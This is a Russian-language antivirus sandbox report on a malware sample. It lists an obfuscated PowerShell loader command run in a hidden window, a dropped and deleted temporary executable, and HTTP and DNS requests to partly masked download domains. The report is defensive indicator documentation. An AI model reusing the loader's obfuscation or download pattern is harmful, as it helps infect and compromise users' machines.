Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $SHeLLID[1]+$SHEllId[13]+'X') ( "$( set 'Ofs' '') " + [StRiNg]( (16,101, 101,121,101 , 85, 20, 9, 20,90, 81,67 , 25, 91 , 86 ,94, 81,87, 64, 20 , 70, 85 ,90, 80, 91,89 , 15, 16, 120, 82,68,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\424293.exe
Удаляет следующие файлы
- %TEMP%\424293.exe
Сетевая активность
Подключается к
- 'he#####ataknowledge.com':80
- 'cc#.al':80
- 'cc#.al':443
- 'es##########ntos.sintinovoy.sevapp20.com':80
TCP
Запросы HTTP GET
- http://he#####ataknowledge.com/uzTxQ/
- http://www.he#####ataknowledge.com/uzTxQ
- http://cc#.al/8YbmKj/
- http://es##########ntos.sintinovoy.sevapp20.com/yuKf/
Другие
- 'cc#.al':443
UDP
- DNS ASK he#####ataknowledge.com
- DNS ASK cc#.al
- DNS ASK re##uo.net
- DNS ASK es##########ntos.sintinovoy.sevapp20.com
- DNS ASK bi####dovovo.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $SHeLLID[1]+$SHEllId[13]+'X') ( "$( set 'Ofs' '') " + [StRiNg]( (16,101, 101,121,101 , 85, 20, 9, 20,90, 81,67 , 25, 91 , 86 ,94, 81,87, 64, 20 , 70, 85 ,90, 80, 91,89 , 15, 16, 120, 82,68,...' (со скрытым окном)
